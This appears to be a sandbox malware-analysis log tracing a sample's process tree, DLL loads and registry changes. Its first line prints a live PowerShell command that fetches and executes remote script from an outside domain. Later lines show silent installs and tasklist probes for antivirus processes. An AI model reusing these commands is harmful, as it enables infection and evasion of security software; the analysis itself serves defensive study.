      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Process created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe Process created: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe Process created: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\timeout.exe "timeout" 9
      Source: C:\Windows\System32\timeout.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: explorerframe.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: dlnashext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: wpdshext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
      Source: C:\Users\user\Desktop\@Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
